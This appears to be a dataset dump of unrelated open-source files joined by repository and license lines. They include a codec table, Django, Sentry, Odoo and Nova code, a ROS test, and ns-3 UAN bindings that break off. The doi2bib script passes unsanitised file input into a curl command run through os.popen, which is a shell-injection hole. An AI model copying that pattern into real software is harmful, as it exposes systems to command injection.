u'\u043f' # 0xD0 -> CYRILLIC SMALL LETTER PE
u'\u044f' # 0xD1 -> CYRILLIC SMALL LETTER YA
u'\u0440' # 0xD2 -> CYRILLIC SMALL LETTER ER
u'\u0441' # 0xD3 -> CYRILLIC SMALL LETTER ES
u'\u0442' # 0xD4 -> CYRILLIC SMALL LETTER TE
u'\u0443' # 0xD5 -> CYRILLIC SMALL LETTER U
u'\u0436' # 0xD6 -> CYRILLIC SMALL LETTER ZHE
u'\u0432' # 0xD7 -> CYRILLIC SMALL LETTER VE
u'\u044c' # 0xD8 -> CYRILLIC SMALL LETTER SOFT SIGN
u'\u044b' # 0xD9 -> CYRILLIC SMALL LETTER YERU
u'\u0437' # 0xDA -> CYRILLIC SMALL LETTER ZE
u'\u0448' # 0xDB -> CYRILLIC SMALL LETTER SHA
u'\u044d' # 0xDC -> CYRILLIC SMALL LETTER E
u'\u0449' # 0xDD -> CYRILLIC SMALL LETTER SHCHA
u'\u0447' # 0xDE -> CYRILLIC SMALL LETTER CHE
u'\u044a' # 0xDF -> CYRILLIC SMALL LETTER HARD SIGN
u'\u042e' # 0xE0 -> CYRILLIC CAPITAL LETTER YU
u'\u0410' # 0xE1 -> CYRILLIC CAPITAL LETTER A
u'\u0411' # 0xE2 -> CYRILLIC CAPITAL LETTER BE
u'\u0426' # 0xE3 -> CYRILLIC CAPITAL LETTER TSE
u'\u0414' # 0xE4 -> CYRILLIC CAPITAL LETTER DE
u'\u0415' # 0xE5 -> CYRILLIC CAPITAL LETTER IE
u'\u0424' # 0xE6 -> CYRILLIC CAPITAL LETTER EF
u'\u0413' # 0xE7 -> CYRILLIC CAPITAL LETTER GHE
u'\u0425' # 0xE8 -> CYRILLIC CAPITAL LETTER HA
u'\u0418' # 0xE9 -> CYRILLIC CAPITAL LETTER I
u'\u0419' # 0xEA -> CYRILLIC CAPITAL LETTER SHORT I
u'\u041a' # 0xEB -> CYRILLIC CAPITAL LETTER KA
u'\u041b' # 0xEC -> CYRILLIC CAPITAL LETTER EL
u'\u041c' # 0xED -> CYRILLIC CAPITAL LETTER EM
u'\u041d' # 0xEE -> CYRILLIC CAPITAL LETTER EN
u'\u041e' # 0xEF -> CYRILLIC CAPITAL LETTER O
u'\u041f' # 0xF0 -> CYRILLIC CAPITAL LETTER PE
u'\u042f' # 0xF1 -> CYRILLIC CAPITAL LETTER YA
u'\u0420' # 0xF2 -> CYRILLIC CAPITAL LETTER ER
u'\u0421' # 0xF3 -> CYRILLIC CAPITAL LETTER ES
u'\u0422' # 0xF4 -> CYRILLIC CAPITAL LETTER TE
u'\u0423' # 0xF5 -> CYRILLIC CAPITAL LETTER U
u'\u0416' # 0xF6 -> CYRILLIC CAPITAL LETTER ZHE
u'\u0412' # 0xF7 -> CYRILLIC CAPITAL LETTER VE
u'\u042c' # 0xF8 -> CYRILLIC CAPITAL LETTER SOFT SIGN
u'\u042b' # 0xF9 -> CYRILLIC CAPITAL LETTER YERU
u'\u0417' # 0xFA -> CYRILLIC CAPITAL LETTER ZE
u'\u0428' # 0xFB -> CYRILLIC CAPITAL LETTER SHA
u'\u042d' # 0xFC -> CYRILLIC CAPITAL LETTER E
u'\u0429' # 0xFD -> CYRILLIC CAPITAL LETTER SHCHA
u'\u0427' # 0xFE -> CYRILLIC CAPITAL LETTER CHE
u'\u042a' # 0xFF -> CYRILLIC CAPITAL LETTER HARD SIGN
)
### Encoding table
encoding_table=codecs.charmap_build(decoding_table)
|
mit
|
MuckRock/muckrock
|
muckrock/accounts/migrations/0033_auto_20171103_1713.py
|
1
|
1051
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-11-03 17:13
import django.core.files.storage
from django.db import migrations, models
import easy_thumbnails.fields
class Migration(migrations.Migration):
dependencies = [
('accounts', '0032_auto_20171025_1551'),
]
operations = [
migrations.AddField(
model_name='statistics',
name='portal_agencies',
field=models.IntegerField(blank=True, null=True),
),
migrations.AddField(
model_name='statistics',
name='sent_communications_portal',
field=models.IntegerField(blank=True, null=True),
),
migrations.AddField(
model_name='statistics',
name='total_portal_tasks',
field=models.IntegerField(blank=True, null=True),
),
migrations.AddField(
model_name='statistics',
name='total_unresolved_portal_tasks',
field=models.IntegerField(blank=True, null=True),
),
]
|
agpl-3.0
|
40123254/cdw11-ag3
|
static/local_publishconf.py
|
31
|
1680
|
#!/usr/bin/env python
# -*- coding: utf-8 -*- #
from __future__ import unicode_literals
# This file is only used if you use `make publish` or
# explicitly specify it as your config file.
import os
import sys
sys.path.append(os.curdir)
from pelicanconf import *
# 因為 publishconf.py 在 pelicanconf.py 之後, 因此若兩處有相同變數的設定, 將以較後讀入的 publishconf.py 中的設定為主.
# 請注意, 為了在近端讓 Tipue search 傳回的搜尋結果連結正確, 必須使用 ./
SITEURL = './'
# 此設定用於近端靜態網頁查驗, 因此使用相對 URL
RELATIVE_URLS = True
# 為了要讓 local 與 gh-pages 上都能夠使用 Tipue search, 可能要採用不同的 theme
THEME = 'theme/pelican-bootstrap3_local'
#BOOTSTRAP_THEME = 'readable'
#BOOTSTRAP_THEME = 'readable-old'
BOOTSTRAP_THEME = 'united'
#PYGMENTS_STYLE = 'paraiso-drak'
#PYGMENTS_STYLE = 'fruity'
# 為了同時兼容 render_math, 必須放棄 fruity
PYGMENTS_STYLE = 'monokai'
FEED_ALL_ATOM = 'feeds/all.atom.xml'
CATEGORY_FEED_ATOM = 'feeds/%s.atom.xml'
DELETE_OUTPUT_DIRECTORY = True
# Following items are often useful when publishing
#DISQUS_SITENAME = "cadlabmanual"
#GOOGLE_ANALYTICS = ""
# 設定網誌以 md 檔案建立的 file system date 為準, 無需自行設定
DEFAULT_DATE = 'fs'
# 近端的 code hightlight
MD_EXTENSIONS = ['fenced_code', 'extra', 'codehilite(linenums=True)']
# 若要依照日期存檔呼叫
#ARTICLE_URL = 'posts/{date:%Y}/{date:%m}/{date:%d}/{slug}/index.html'
#ARTICLE_SAVE_AS = 'posts/{date:%Y}/{date:%m}/{date:%d}/{slug}/index.html'
PAGE_URL = 'pages/{slug}/'
PAGE_SAVE_AS = 'pages/{slug}/index.html'
SHOW_ARTICLE_AUTHOR = True
|
agpl-3.0
|
ewdurbin/sentry
|
src/sentry/models/organizationaccessrequest.py
|
24
|
2510
|
"""
sentry.models.organizationmember
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import, print_function
import logging
from django.core.urlresolvers import reverse
from sentry.db.models import FlexibleForeignKey, Model, sane_repr
from sentry.utils.http import absolute_uri
class OrganizationAccessRequest(Model):
team = FlexibleForeignKey('sentry.Team')
member = FlexibleForeignKey('sentry.OrganizationMember')
class Meta:
app_label = 'sentry'
db_table = 'sentry_organizationaccessrequest'
unique_together = (('team', 'member'),)
__repr__ = sane_repr('team_id', 'member_id')
def send_request_email(self):
from sentry.utils.email import MessageBuilder
user = self.member.user
email = user.email
organization = self.team.organization
context = {
'email': email,
'name': user.get_display_name(),
'organization': organization,
'team': self.team,
'url': absolute_uri(reverse('sentry-organization-members', kwargs={
'organization_slug': organization.slug,
}) + '?ref=access-requests'),
}
msg = MessageBuilder(
subject='Sentry Access Request',
template='sentry/emails/request-team-access.txt',
html_template='sentry/emails/request-team-access.html',
context=context,
)
try:
msg.send([email])
except Exception as e:
logger = logging.getLogger('sentry.mail.errors')
logger.exception(e)
def send_approved_email(self):
from sentry.utils.email import MessageBuilder
user = self.member.user
email = user.email
organization = self.team.organization
context = {
'email': email,
'name': user.get_display_name(),
'organization': organization,
'team': self.team,
}
msg = MessageBuilder(
subject='Sentry Access Request',
template='sentry/emails/access-approved.txt',
html_template='sentry/emails/access-approved.html',
context=context,
)
try:
msg.send([email])
except Exception as e:
logger = logging.getLogger('sentry.mail.errors')
logger.exception(e)
|
bsd-3-clause
|
pfdamasceno/shakespeare
|
content_sources/doi2bib.py
|
1
|
1834
|
#modified from https://gist.github.com/zmwangx
#!/usr/bin/env python
# Take one argument--the doi, and convert it to bibtex using an API
# call to dx.doi.org.
from sys import argv
import os, re
#if argv[0].find('doi') != -1:
# # run as executable
# doi = argv[1]
#else:
# # run from python
# doi = argv[2]
doi_sub_str="dx.doi.org/"
f = open("/Users/damascus/Documents/Cloud/Dropbox/HipChat_DOIs/DOI.txt", 'r')
for line in f:
try:
doi_str = line
doi = re.split('\s', doi_str[doi_str.find(doi_sub_str)+(len(doi_sub_str)):])[0]
cmd = ('curl -sLH "Accept: text/bibliography; style=bibtex" ' +
'http://dx.doi.org/' + doi)
bib_oneliner = os.popen(cmd).read()
# convert bib_oneliner to formatted (multiline) bibtex
bib = ''
# extract type
entry_type = bib_oneliner[bib_oneliner.find('@') + 1:
bib_oneliner.find('{')]
bib += '@' + entry_type + '{' + doi + ',\n'; # use doi as cite key
# parse body
body = bib_oneliner[bib_oneliner.find(',')+2:-2] + ','
while body:
# match curly braces
left_minus_right = 0
i = 0
while True:
if body[i] == '{':
left_minus_right += 1
if body[i] == '}':
left_minus_right -= 1
if left_minus_right == 0:
# outermost level matched up, one entry finished
# advance one char for the trailing comma
i += 1
break
i += 1
bib += ' ' + body[:i+1] + '\n'
body = body[i+1:].strip()
bib += '}'
print(bib)
except:
pass
|
mit
|
citueda/pimouse_run_corridor
|
test/travis_test_wall_trace.py
|
1
|
1423
|
#!/usr/bin/env python
import unittest, rostest
import rosnode, rospy
import time
class WallTraceTest(unittest.TestCase):
def set_and_get(self,lf,ls,rs,rf):
with open("/dev/rtlightsensor0","w") as f:
f.write("%d %d %d %d\n" % (rf,rs,ls,lf))
time.sleep(0.3)
with open("/dev/rtmotor_raw_l0","r") as lf,\
open("/dev/rtmotor_raw_r0","r") as rf:
left = int(lf.readline().rstrip())
right = int(rf.readline().rstrip())
return left, right
def test_io(self):
left, right = self.set_and_get(400,0,0,100) #total: 600
self.assertTrue(left == right == 0,"can't stop")
left, right = self.set_and_get(0,5,1000,0) #side direction is not a trigger of stop
self.assertTrue(left == right != 0,"stop wrongly by side sensors")
left, right = self.set_and_get(0,10,0,0) #curve to left
self.assertTrue(left < right, "don't curve to left")
left, right = self.set_and_get(0,200,0,0) #curve to right
self.assertTrue(left > right, "don't curve to right")
left, right = self.set_and_get(0,5,0,0) # don't control when far from a wall
self.assertTrue(0 < left == right, "curve wrongly")
if __name__ == '__main__':
time.sleep(3)
rospy.init_node('travis_test_wall_trace')
rostest.rosrun('pimouse_run_corridor','travis_test_wall_trace',WallTraceTest)
|
mit
|
kimjaejoong/nova
|
nova/api/openstack/compute/schemas/v3/server_groups.py
|
65
|
1564
|
# Copyright 2014 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.api.validation import parameter_types
# NOTE(russellb) There is one other policy, 'legacy', but we don't allow that
# being set via the API. It's only used when a group gets automatically
# created to support the legacy behavior of the 'group' scheduler hint.
SUPPORTED_POLICIES = ['anti-affinity', 'affinity']
create = {
'type': 'object',
'properties': {
'server_group': {
'type': 'object',
'properties': {
'name': parameter_types.name,
'policies': {
'type': 'array',
'items': [{'enum': SUPPORTED_POLICIES}],
'uniqueItems': True,
'additionalItems': False,
}
},
'required': ['name', 'policies'],
'additionalProperties': False,
}
},
'required': ['server_group'],
'additionalProperties': False,
}
|
apache-2.0
|
OCA/e-commerce
|
website_sale_attribute_filter_category/controllers/main.py
|
2
|
1312
|
# Copyright 2019 Tecnativa - Sergio Teruel
# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl).
from odoo.addons.website_sale.controllers.main import WebsiteSale
from odoo import _, http
class ProductAttributeCategory(WebsiteSale):
@http.route()
def shop(self, page=0, category=None, search='', ppg=False, **post):
response = super(ProductAttributeCategory, self).shop(
page=page, category=category, search=search, ppg=ppg, **post)
# Re-order attributes by their category sequence
response.qcontext['attributes'] = (
response.qcontext['attributes'].sorted(
lambda x: (x.category_id.sequence, x.id)))
# Load all categories, and load a "False" category for attributes that
# has not category and display it under 'Undefined' category
categories = [(False, _('Undefined'), True)]
categories.extend(
(x.id,
x.name,
x.website_folded
) for x in response.qcontext['attributes'].mapped('category_id'))
response.qcontext['attribute_categories'] = categories
response.qcontext['filtered_products'] = False
if search or post.get('attrib', False):
response.qcontext['filtered_products'] = True
return response
|
agpl-3.0
|
TakashiSasaki/ns-3-nat
|
src/uan/bindings/modulegen__gcc_LP64.py
|
24
|
494820
|
from pybindgen import Module, FileCodeSink, param, retval, cppclass, typehandlers
import pybindgen.settings
import warnings
class ErrorHandler(pybindgen.settings.ErrorHandler):
def handle_error(self, wrapper, exception, traceback_):
warnings.warn("exception %r in wrapper %s" % (exception, wrapper))
return True
pybindgen.settings.error_handler = ErrorHandler()
import sys
def module_init():
root_module = Module('ns.uan', cpp_namespace='::ns3')
return root_module
def register_types(module):
root_module = module.get_root()
## address.h (module 'network'): ns3::Address [class]
module.add_class('Address', import_from_module='ns.network')
## address.h (module 'network'): ns3::Address::MaxSize_e [enumeration]
module.add_enum('MaxSize_e', ['MAX_SIZE'], outer_class=root_module['ns3::Address'], import_from_module='ns.network')
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList [class]
module.add_class('AttributeConstructionList', import_from_module='ns.core')
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item [struct]
module.add_class('Item', import_from_module='ns.core', outer_class=root_module['ns3::AttributeConstructionList'])
## buffer.h (module 'network'): ns3::Buffer [class]
module.add_class('Buffer', import_from_module='ns.network')
## buffer.h (module 'network'): ns3::Buffer::Iterator [class]
module.add_class('Iterator', import_from_module='ns.network', outer_class=root_module['ns3::Buffer'])
## packet.h (module 'network'): ns3::ByteTagIterator [class]
module.add_class('ByteTagIterator', import_from_module='ns.network')
## packet.h (module 'network'): ns3::ByteTagIterator::Item [class]
module.add_class('Item', import_from_module='ns.network', outer_class=root_module['ns3::ByteTagIterator'])
## byte-tag-list.h (module 'network'): ns3::ByteTagList [class]
module.add_class('ByteTagList', import_from_module='ns.network')
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator [class]
module.add_class('Iterator', import_from_module='ns.network', outer_class=root_module['ns3::ByteTagList'])
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item [struct]
module.add_class('Item', import_from_module='ns.network', outer_class=root_module['ns3::ByteTagList::Iterator'])
## callback.h (module 'core'): ns3::CallbackBase [class]
module.add_class('CallbackBase', import_from_module='ns.core')
## device-energy-model-container.h (module 'energy'): ns3::DeviceEnergyModelContainer [class]
module.add_class('DeviceEnergyModelContainer', import_from_module='ns.energy')
## energy-model-helper.h (module 'energy'): ns3::DeviceEnergyModelHelper [class]
module.add_class('DeviceEnergyModelHelper', allow_subclassing=True, import_from_module='ns.energy')
## energy-model-helper.h (module 'energy'): ns3::EnergySourceHelper [class]
module.add_class('EnergySourceHelper', allow_subclassing=True, import_from_module='ns.energy')
## event-id.h (module 'core'): ns3::EventId [class]
module.add_class('EventId', import_from_module='ns.core')
## ipv4-address.h (module 'network'): ns3::Ipv4Address [class]
module.add_class('Ipv4Address', import_from_module='ns.network')
## ipv4-address.h (module 'network'): ns3::Ipv4Address [class]
root_module['ns3::Ipv4Address'].implicitly_converts_to(root_module['ns3::Address'])
## ipv4-address.h (module 'network'): ns3::Ipv4Mask [class]
module.add_class('Ipv4Mask', import_from_module='ns.network')
## ipv6-address.h (module 'network'): ns3::Ipv6Address [class]
module.add_class('Ipv6Address', import_from_module='ns.network')
## ipv6-address.h (module 'network'): ns3::Ipv6Address [class]
root_module['ns3::Ipv6Address'].implicitly_converts_to(root_module['ns3::Address'])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix [class]
module.add_class('Ipv6Prefix', import_from_module='ns.network')
## net-device-container.h (module 'network'): ns3::NetDeviceContainer [class]
module.add_class('NetDeviceContainer', import_from_module='ns.network')
## node-container.h (module 'network'): ns3::NodeContainer [class]
module.add_class('NodeContainer', import_from_module='ns.network')
## object-base.h (module 'core'): ns3::ObjectBase [class]
module.add_class('ObjectBase', allow_subclassing=True, import_from_module='ns.core')
## object.h (module 'core'): ns3::ObjectDeleter [struct]
module.add_class('ObjectDeleter', import_from_module='ns.core')
## object-factory.h (module 'core'): ns3::ObjectFactory [class]
module.add_class('ObjectFactory', import_from_module='ns.core')
## packet-metadata.h (module 'network'): ns3::PacketMetadata [class]
module.add_class('PacketMetadata', import_from_module='ns.network')
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item [struct]
module.add_class('Item', import_from_module='ns.network', outer_class=root_module['ns3::PacketMetadata'])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item [enumeration]
module.add_enum('', ['PAYLOAD', 'HEADER', 'TRAILER'], outer_class=root_module['ns3::PacketMetadata::Item'], import_from_module='ns.network')
## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator [class]
module.add_class('ItemIterator', import_from_module='ns.network', outer_class=root_module['ns3::PacketMetadata'])
## packet.h (module 'network'): ns3::PacketTagIterator [class]
module.add_class('PacketTagIterator', import_from_module='ns.network')
## packet.h (module 'network'): ns3::PacketTagIterator::Item [class]
module.add_class('Item', import_from_module='ns.network', outer_class=root_module['ns3::PacketTagIterator'])
## packet-tag-list.h (module 'network'): ns3::PacketTagList [class]
module.add_class('PacketTagList', import_from_module='ns.network')
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData [struct]
module.add_class('TagData', import_from_module='ns.network', outer_class=root_module['ns3::PacketTagList'])
## uan-mac-rc.h (module 'uan'): ns3::Reservation [class]
module.add_class('Reservation')
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter> [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Object', 'ns3::ObjectBase', 'ns3::ObjectDeleter'], parent=root_module['ns3::ObjectBase'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simulator.h (module 'core'): ns3::Simulator [class]
module.add_class('Simulator', destructor_visibility='private', import_from_module='ns.core')
## tag.h (module 'network'): ns3::Tag [class]
module.add_class('Tag', import_from_module='ns.network', parent=root_module['ns3::ObjectBase'])
## tag-buffer.h (module 'network'): ns3::TagBuffer [class]
module.add_class('TagBuffer', import_from_module='ns.network')
## uan-prop-model.h (module 'uan'): ns3::Tap [class]
module.add_class('Tap')
## traced-value.h (module 'core'): ns3::TracedValue<double> [class]
module.add_class('TracedValue', import_from_module='ns.core', template_parameters=['double'])
## type-id.h (module 'core'): ns3::TypeId [class]
module.add_class('TypeId', import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId::AttributeFlag [enumeration]
module.add_enum('AttributeFlag', ['ATTR_GET', 'ATTR_SET', 'ATTR_CONSTRUCT', 'ATTR_SGC'], outer_class=root_module['ns3::TypeId'], import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation [struct]
module.add_class('AttributeInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation [struct]
module.add_class('TraceSourceInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
## uan-address.h (module 'uan'): ns3::UanAddress [class]
module.add_class('UanAddress')
## uan-address.h (module 'uan'): ns3::UanAddress [class]
root_module['ns3::UanAddress'].implicitly_converts_to(root_module['ns3::Address'])
## uan-helper.h (module 'uan'): ns3::UanHelper [class]
module.add_class('UanHelper')
## uan-tx-mode.h (module 'uan'): ns3::UanModesList [class]
module.add_class('UanModesList')
## uan-transducer.h (module 'uan'): ns3::UanPacketArrival [class]
module.add_class('UanPacketArrival')
## uan-prop-model.h (module 'uan'): ns3::UanPdp [class]
module.add_class('UanPdp')
## uan-phy.h (module 'uan'): ns3::UanPhyListener [class]
module.add_class('UanPhyListener', allow_subclassing=True)
## uan-tx-mode.h (module 'uan'): ns3::UanTxMode [class]
module.add_class('UanTxMode')
## uan-tx-mode.h (module 'uan'): ns3::UanTxMode::ModulationType [enumeration]
module.add_enum('ModulationType', ['PSK', 'QAM', 'FSK', 'OTHER'], outer_class=root_module['ns3::UanTxMode'])
## uan-tx-mode.h (module 'uan'): ns3::UanTxModeFactory [class]
module.add_class('UanTxModeFactory')
## vector.h (module 'core'): ns3::Vector2D [class]
module.add_class('Vector2D', import_from_module='ns.core')
## vector.h (module 'core'): ns3::Vector3D [class]
module.add_class('Vector3D', import_from_module='ns.core')
## empty.h (module 'core'): ns3::empty [class]
module.add_class('empty', import_from_module='ns.core')
## int64x64-double.h (module 'core'): ns3::int64x64_t [class]
module.add_class('int64x64_t', import_from_module='ns.core')
## acoustic-modem-energy-model-helper.h (module 'uan'): ns3::AcousticModemEnergyModelHelper [class]
module.add_class('AcousticModemEnergyModelHelper', parent=root_module['ns3::DeviceEnergyModelHelper'])
## chunk.h (module 'network'): ns3::Chunk [class]
module.add_class('Chunk', import_from_module='ns.network', parent=root_module['ns3::ObjectBase'])
## header.h (module 'network'): ns3::Header [class]
module.add_class('Header', import_from_module='ns.network', parent=root_module['ns3::Chunk'])
## object.h (module 'core'): ns3::Object [class]
module.add_class('Object', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter >'])
## object.h (module 'core'): ns3::Object::AggregateIterator [class]
module.add_class('AggregateIterator', import_from_module='ns.core', outer_class=root_module['ns3::Object'])
## random-variable-stream.h (module 'core'): ns3::RandomVariableStream [class]
module.add_class('RandomVariableStream', import_from_module='ns.core', parent=root_module['ns3::Object'])
## random-variable-stream.h (module 'core'): ns3::SequentialRandomVariable [class]
module.add_class('SequentialRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeChecker', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeChecker>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeValue', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeValue>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::CallbackImplBase', 'ns3::empty', 'ns3::DefaultDeleter<ns3::CallbackImplBase>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::EventImpl', 'ns3::empty', 'ns3::DefaultDeleter<ns3::EventImpl>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::NixVector', 'ns3::empty', 'ns3::DefaultDeleter<ns3::NixVector>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Packet', 'ns3::empty', 'ns3::DefaultDeleter<ns3::Packet>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::TraceSourceAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::TraceSourceAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## nstime.h (module 'core'): ns3::Time [class]
module.add_class('Time', import_from_module='ns.core')
## nstime.h (module 'core'): ns3::Time::Unit [enumeration]
module.add_enum('Unit', ['S', 'MS', 'US', 'NS', 'PS', 'FS', 'LAST'], outer_class=root_module['ns3::Time'], import_from_module='ns.core')
## nstime.h (module 'core'): ns3::Time [class]
root_module['ns3::Time'].implicitly_converts_to(root_module['ns3::int64x64_t'])
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor [class]
module.add_class('TraceSourceAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
## trailer.h (module 'network'): ns3::Trailer [class]
module.add_class('Trailer', import_from_module='ns.network', parent=root_module['ns3::Chunk'])
## random-variable-stream.h (module 'core'): ns3::TriangularRandomVariable [class]
module.add_class('TriangularRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## uan-header-common.h (module 'uan'): ns3::UanHeaderCommon [class]
module.add_class('UanHeaderCommon', parent=root_module['ns3::Header'])
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcAck [class]
module.add_class('UanHeaderRcAck', parent=root_module['ns3::Header'])
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcCts [class]
module.add_class('UanHeaderRcCts', parent=root_module['ns3::Header'])
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcCtsGlobal [class]
module.add_class('UanHeaderRcCtsGlobal', parent=root_module['ns3::Header'])
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcData [class]
module.add_class('UanHeaderRcData', parent=root_module['ns3::Header'])
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcRts [class]
module.add_class('UanHeaderRcRts', parent=root_module['ns3::Header'])
## uan-mac.h (module 'uan'): ns3::UanMac [class]
module.add_class('UanMac', parent=root_module['ns3::Object'])
## uan-mac-aloha.h (module 'uan'): ns3::UanMacAloha [class]
module.add_class('UanMacAloha', parent=root_module['ns3::UanMac'])
## uan-mac-cw.h (module 'uan'): ns3::UanMacCw [class]
module.add_class('UanMacCw', parent=[root_module['ns3::UanMac'], root_module['ns3::UanPhyListener']])
## uan-mac-rc.h (module 'uan'): ns3::UanMacRc [class]
module.add_class('UanMacRc', parent=root_module['ns3::UanMac'])
## uan-mac-rc.h (module 'uan'): ns3::UanMacRc [enumeration]
module.add_enum('', ['TYPE_DATA', 'TYPE_GWPING', 'TYPE_RTS', 'TYPE_CTS', 'TYPE_ACK'], outer_class=root_module['ns3::UanMacRc'])
## uan-mac-rc-gw.h (module 'uan'): ns3::UanMacRcGw [class]
module.add_class('UanMacRcGw', parent=root_module['ns3::UanMac'])
## uan-noise-model.h (module 'uan'): ns3::UanNoiseModel [class]
module.add_class('UanNoiseModel', parent=root_module['ns3::Object'])
## uan-noise-model-default.h (module 'uan'): ns3::UanNoiseModelDefault [class]
module.add_class('UanNoiseModelDefault', parent=root_module['ns3::UanNoiseModel'])
## uan-phy.h (module 'uan'): ns3::UanPhy [class]
module.add_class('UanPhy', parent=root_module['ns3::Object'])
## uan-phy.h (module 'uan'): ns3::UanPhy::State [enumeration]
module.add_enum('State', ['IDLE', 'CCABUSY', 'RX', 'TX', 'SLEEP'], outer_class=root_module['ns3::UanPhy'])
## uan-phy.h (module 'uan'): ns3::UanPhyCalcSinr [class]
module.add_class('UanPhyCalcSinr', parent=root_module['ns3::Object'])
## uan-phy-gen.h (module 'uan'): ns3::UanPhyCalcSinrDefault [class]
